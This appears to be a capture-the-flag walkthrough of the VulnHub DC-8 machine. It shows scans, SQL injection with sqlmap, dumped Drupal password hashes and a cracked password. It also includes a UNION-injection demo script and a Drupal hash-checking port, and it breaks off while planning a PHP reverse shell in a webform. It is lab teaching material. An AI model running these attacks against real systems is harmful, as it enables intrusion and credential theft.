Target VM: https://www.vulnhub.com/entry/dc-8,367/
Goal: get root and read the one and only flag
一、Host discovery
nmap -sP 192.168.11.0/24 |grep 192.168.11 |awk '{print($5)}'
(-sP is the legacy spelling of -sn, a ping sweep with no port scan; the awk prints the fifth field of each "Nmap scan report for <ip>" line, i.e. the address.)
Target IP found: 192.168.11.138
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.11.0/24 |grep 192.168.11 |awk '{print($5)}'
192.168.11.1
192.168.11.138
192.168.11.254
192.168.11.128
二、Port scan
nmap -A -Pn -p1-65535 192.168.11.138
(-A turns on version detection, OS detection, default scripts and traceroute; -Pn skips host discovery since the box is already known to be up; -p1-65535, or simply -p-, covers every TCP port.)
┌──(root㉿kali)-[~]
└─# nmap -A -Pn -p1-65535 192.168.11.138
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-10 13:52 CST
Nmap scan report for 192.168.11.138
Host is up (0.0042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35a7e6c4a83c631de1c0caa366bc88bf (RSA)
| 256 abef9f69acea54c68c6155490ae7aad9 (ECDSA)
|_ 256 7ab2c687ec9376d4ea594b1bc6e873f2 (ED25519)
80/tcp open http Apache httpd
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to DC-8 | DC-8
|_http-server-header: Apache
MAC Address: 00:0C:29:70:FE:93 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 4.22 ms 192.168.11.138
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds
The scan finds two open ports: 22 (OpenSSH 7.4p1, Debian) and 80 (Apache serving a Drupal 7 site, whose robots.txt already lists the paths worth looking at).
三、Directory scan
dirsearch -u 192.168.11.138 -e '*' -x 403
-u  target URL
-e  extensions to append to wordlist entries (an explicit list such as -e php,txt is the safer choice)
-x  response status codes to exclude from the output
Quote the asterisk. Left bare, as in the run below, the shell expands * against the current directory before dirsearch ever sees it, which is why the banner reports "Extensions: 公共" (a folder name from the Chinese-locale home directory on this Kali box) instead of a list of extensions.
┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.11.138 -e * -x 403
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: 公共 | HTTP method: GET | Threads: 30 | Wordlist size: 9009
Output File: /root/.dirsearch/reports/192.168.11.138_23-03-10_14-08-18.txt
Error Log: /root/.dirsearch/logs/errors-23-03-10_14-08-18.log
Target: http://192.168.11.138/
[14:08:18] Starting:
[14:08:20] 200 - 8KB - /0
[14:08:22] 200 - 111KB - /CHANGELOG.txt
[14:08:22] 200 - 1KB - /COPYRIGHT.txt
[14:08:22] 200 - 2KB - /INSTALL.mysql.txt
[14:08:22] 200 - 18KB - /INSTALL.txt
[14:08:22] 200 - 2KB - /INSTALL.pgsql.txt
[14:08:22] 200 - 18KB - /LICENSE.txt
[14:08:23] 200 - 8KB - /MAINTAINERS.txt
[14:08:23] 200 - 5KB - /README.txt
[14:08:24] 200 - 10KB - /UPGRADE.txt
[14:08:49] 301 - 239B - /includes -> http://192.168.11.138/includes/
[14:08:49] 200 - 8KB - /index.php
[14:08:49] 200 - 3KB - /install.php
[14:08:54] 301 - 235B - /misc -> http://192.168.11.138/misc/
[14:08:54] 301 - 238B - /modules -> http://192.168.11.138/modules/
[14:08:55] 200 - 7KB - /node
[14:09:00] 301 - 239B - /profiles -> http://192.168.11.138/profiles/
[14:09:01] 200 - 2KB - /robots.txt
[14:09:02] 301 - 238B - /scripts -> http://192.168.11.138/scripts/
[14:09:06] 301 - 236B - /sites -> http://192.168.11.138/sites/
[14:09:06] 200 - 904B - /sites/README.txt
[14:09:06] 200 - 0B - /sites/example.sites.php
[14:09:06] 200 - 1020B - /sites/all/themes/README.txt
[14:09:06] 200 - 1KB - /sites/all/modules/README.txt
[14:09:06] 200 - 151B - /sites/all/libraries/README.txt
[14:09:13] 301 - 237B - /themes -> http://192.168.11.138/themes/
[14:09:17] 200 - 8KB - /user
[14:09:17] 200 - 8KB - /user/
[14:09:17] 200 - 8KB - /user/login/
[14:09:20] 200 - 2KB - /web.config
[14:09:24] 200 - 42B - /xmlrpc.php
Task Completed
- CHANGELOG.txt: the framework's changelog, which gives away the exact Drupal release
- /user/login/: the admin login page
- The rest is of little use
四、Exploring the site
Note: Drupal is an open-source content management framework (CMF) written in PHP. It consists of a content management system (CMS) plus a PHP development framework, and is released under GPL 2.0 or later.
The scans show the site runs on the PHP-based Drupal framework.
Reading the CHANGELOG.txt found earlier shows the installed release is recent enough that the well-known Drupal vulnerabilities have already been patched, so this is not going to fall to a canned CMS exploit (and nobody wants to white-box audit the source).
Poking around the site, the URL parameter nid stands out: a node id passed straight through the query string is a natural candidate for SQL injection or XSS.
http://192.168.11.138/?nid=1
五、SQL injection
Append a single quote to the nid parameter:
http://192.168.11.138/?nid=1'
The page comes back with a SQL error, so the value reaches the database's parser unescaped. Hand it to sqlmap.
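The two behaviours just described (a stray quote producing a SQL error, and the same string concatenation letting a UNION read other tables) are easy to reproduce offline. The script below is an added example, not code from the DC-8 box or from Drupal: it puts a deliberately vulnerable node lookup next to a hardened one over an in-memory SQLite copy of the relevant tables. The table contents are constructed sample data (the pass values are shortened placeholders, not the real hashes), and SQLite's || stands in for MySQL's CONCAT() in the union payload.

```python
import sqlite3

# Constructed sample data standing in for the d7db schema; the pass values are
# shortened placeholders, not the real hashes from the box.
SAMPLE_SQL = """
CREATE TABLE node(nid INTEGER, title TEXT);
CREATE TABLE users(uid INTEGER, name TEXT, pass TEXT);
INSERT INTO node VALUES (1, 'Welcome to DC-8'), (2, 'Contact Us');
INSERT INTO users VALUES (0, '', ''),
                         (1, 'admin', '$S$D2tR...'),
                         (2, 'john',  '$S$Dqup...');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SQL)
    return conn


def node_title_vulnerable(conn, nid: str) -> list:
    # The value from ?nid= is pasted into the SQL text, so the database parses
    # whatever the client sent: a stray quote is a syntax error, and a UNION
    # turns the node lookup into a query over any other table.
    sql = "SELECT title FROM node WHERE nid = " + nid
    return [row[0] for row in conn.execute(sql)]


def node_title_safe(conn, nid: str) -> list:
    # Hardened form: nid must be an integer, and it travels as a bound
    # parameter, never as part of the SQL text.
    try:
        nid_int = int(nid)
    except ValueError:
        return []
    rows = conn.execute("SELECT title FROM node WHERE nid = ?", (nid_int,))
    return [row[0] for row in rows]


def quote_causes_error(lookup, conn) -> bool:
    # The "append a quote" test from the write-up: True means the backend
    # raised a SQL error for nid=1', i.e. the input reached the parser.
    try:
        lookup(conn, "1'")
        return False
    except sqlite3.Error:
        return True


# Single-column UNION over users. SQLite concatenates with || where MySQL
# would use CONCAT(); this is the kind of query sqlmap builds automatically.
UNION_PAYLOAD = "0 UNION SELECT uid || ':' || name || ':' || pass FROM users"


def dump_users(lookup, conn) -> list:
    # Sorted so the result does not depend on UNION's output order.
    return sorted(lookup(conn, UNION_PAYLOAD))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable: quote error?", quote_causes_error(node_title_vulnerable, db))
    print("vulnerable: union dump  ", dump_users(node_title_vulnerable, db))
    print("safe:       quote error?", quote_causes_error(node_title_safe, db))
    print("safe:       union dump  ", dump_users(node_title_safe, db))
```

Run it as-is: the vulnerable lookup reports the quote error and returns every row of users through the node endpoint, while the hardened lookup treats both payloads as "not an id" and returns nothing, which is exactly the difference between the error seen above and a quiet 200 with no results.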
1、Enumerate the databases (--batch accepts sqlmap's default answer to every prompt)
sqlmap -u "http://192.168.11.138/?nid=1" --dbs --batch
available databases [2]:
[*] d7db
[*] information_schema
2、Enumerate the tables
sqlmap -u "http://192.168.11.138/?nid=1" -D d7db --tables --batch
Database: d7db
[88 tables]
+-----------------------------+
| filter |
| system |
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_views |
| cache_views_data |
| ckeditor_input_format |
| ckeditor_settings |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| site_messages_table |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
| webform |
| webform_component |
| webform_conditional |
| webform_conditional_actions |
| webform_conditional_rules |
| webform_emails |
| webform_last_download |
| webform_roles |
| webform_submissions |
| webform_submitted_data |
+-----------------------------+
3、Enumerate the columns
There are 88 tables, but the one that matters is users.
sqlmap -u "http://192.168.11.138/?nid=1" -D d7db -T users --columns --batch
Database: d7db
Table: users
[16 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| language | varchar(12) |
| access | int(11) |
| created | int(11) |
| data | longblob |
| init | varchar(254) |
| login | int(11) |
| mail | varchar(254) |
| name | varchar(60) |
| pass | varchar(128) |
| picture | int(11) |
| signature | varchar(255) |
| signature_format | varchar(255) |
| status | tinyint(4) |
| theme | varchar(255) |
| timezone | varchar(32) |
| uid | int(10) unsigned |
+------------------+------------------+
4、Dump the data
sqlmap -u "http://192.168.11.138/?nid=1" -D d7db -T users -C uid,name,pass --dump --batch
Database: d7db
Table: users
[3 entries]
+-----+---------+---------------------------------------------------------+
| uid | name | pass |
+-----+---------+---------------------------------------------------------+
| 0 | <blank> | <blank> |
| 1 | admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| 2 | john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-----+---------+---------------------------------------------------------+
5、Save the hashes
Two users with salted hashes. The $S$ prefix marks Drupal 7's native password format, and the fourth character (D) encodes the iteration count as 2^15. Save each hash to its own file, here named admin and john; writing them as name:hash instead would make john print the user name rather than "?" in the output below.
六、Cracking the hashes
Drupal 7 hashes are a phpass-style construction (salted, iterated SHA-512), so crack them with john, which detects the Drupal7 format on its own:
john admin
john john
Without --wordlist, john runs its default modes (single crack, then its bundled password.lst, then incremental); pass a real wordlist such as rockyou.txt for anything beyond trivial passwords. Use --show to see what has been cracked:
┌──(root㉿kali)-[~]
└─# john --show admin
0 password hashes cracked, 1 left
┌──(root㉿kali)-[~]
└─# john --show john
?:turtle
1 password hash cracked, 0 left
admin did not crack; only john's password came out: turtle.
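To make the hash format concrete, here is an added Python port of Drupal 7's password check (the phpass-style scheme behind the $S$ prefix, from includes/password.inc). It is not code from the box or from john; it verifies the cracked password against john's hash from the dump above and shows why the admin hash holds out: each guess costs 2^15 chained SHA-512 operations. The only input is the hash already shown on this page; the $P$/$H$ and U$ branches are kept so the port matches Drupal's logic, but nothing on the page exercises them.

```python
import hashlib
import hmac

# Constants from Drupal 7's includes/password.inc.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # stored hashes are truncated to this length
MIN_LOG2, MAX_LOG2 = 7, 30  # accepted range for the iteration-count exponent

# john's hash exactly as dumped from d7db.users above.
JOHN_HASH = "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF"


def encode64(data: bytes) -> str:
    """phpass base64 variant: 6-bit groups, little-endian within 3-byte chunks."""
    out, i, count = [], 0, len(data)
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(stored: str) -> dict:
    """Split the 12-character setting prefix: $<type>$<log2 count><8-char salt>."""
    setting = stored[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        raise ValueError("not a phpass-style hash")
    log2 = ITOA64.index(setting[3])
    if not MIN_LOG2 <= log2 <= MAX_LOG2:
        raise ValueError("iteration count out of range")
    return {"setting": setting, "log2": log2, "salt": setting[4:12]}


def drupal_crypt(algo: str, password: str, stored: str) -> str:
    """Port of _password_crypt(): hash(salt+pw), then 2**log2 rounds of hash(prev+pw)."""
    s = parse_setting(stored)
    pw = password.encode()
    digest = hashlib.new(algo, s["salt"].encode() + pw).digest()
    for _ in range(1 << s["log2"]):
        digest = hashlib.new(algo, digest + pw).digest()
    return (s["setting"] + encode64(digest))[:HASH_LENGTH]


def check_password(password: str, stored: str) -> bool:
    """Port of user_check_password(): $S$ is SHA-512; $P$/$H$ are phpass MD5 imports."""
    if stored.startswith("U$"):  # hash migrated from Drupal 6: extra md5() of the password
        stored = stored[1:]
        password = hashlib.md5(password.encode()).hexdigest()
    algo = {"$S$": "sha512", "$P$": "md5", "$H$": "md5"}.get(stored[:3])
    if algo is None:
        return False
    return hmac.compare_digest(drupal_crypt(algo, password, stored), stored)


if __name__ == "__main__":
    print("iterations: 2**%d" % parse_setting(JOHN_HASH)["log2"])
    print("turtle ->", check_password("turtle", JOHN_HASH))
    print("Turtle ->", check_password("Turtle", JOHN_HASH))
```

The 2^15 loop is what makes each candidate expensive for john, so a targeted wordlist matters far more than raw speed; it is also why the stored value is truncated to 55 characters rather than the full 98-character encoding.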
七、Reverse shell
The directory scan turned up the login page at /user/login/; log in there as john with the cracked password.
Exploring the backend shows that a Webform's settings accept PHP code that the site will execute, so start a listener on Kali
and write a reverse shell in there (Contact Us --> Webform --> Form settings).
Note: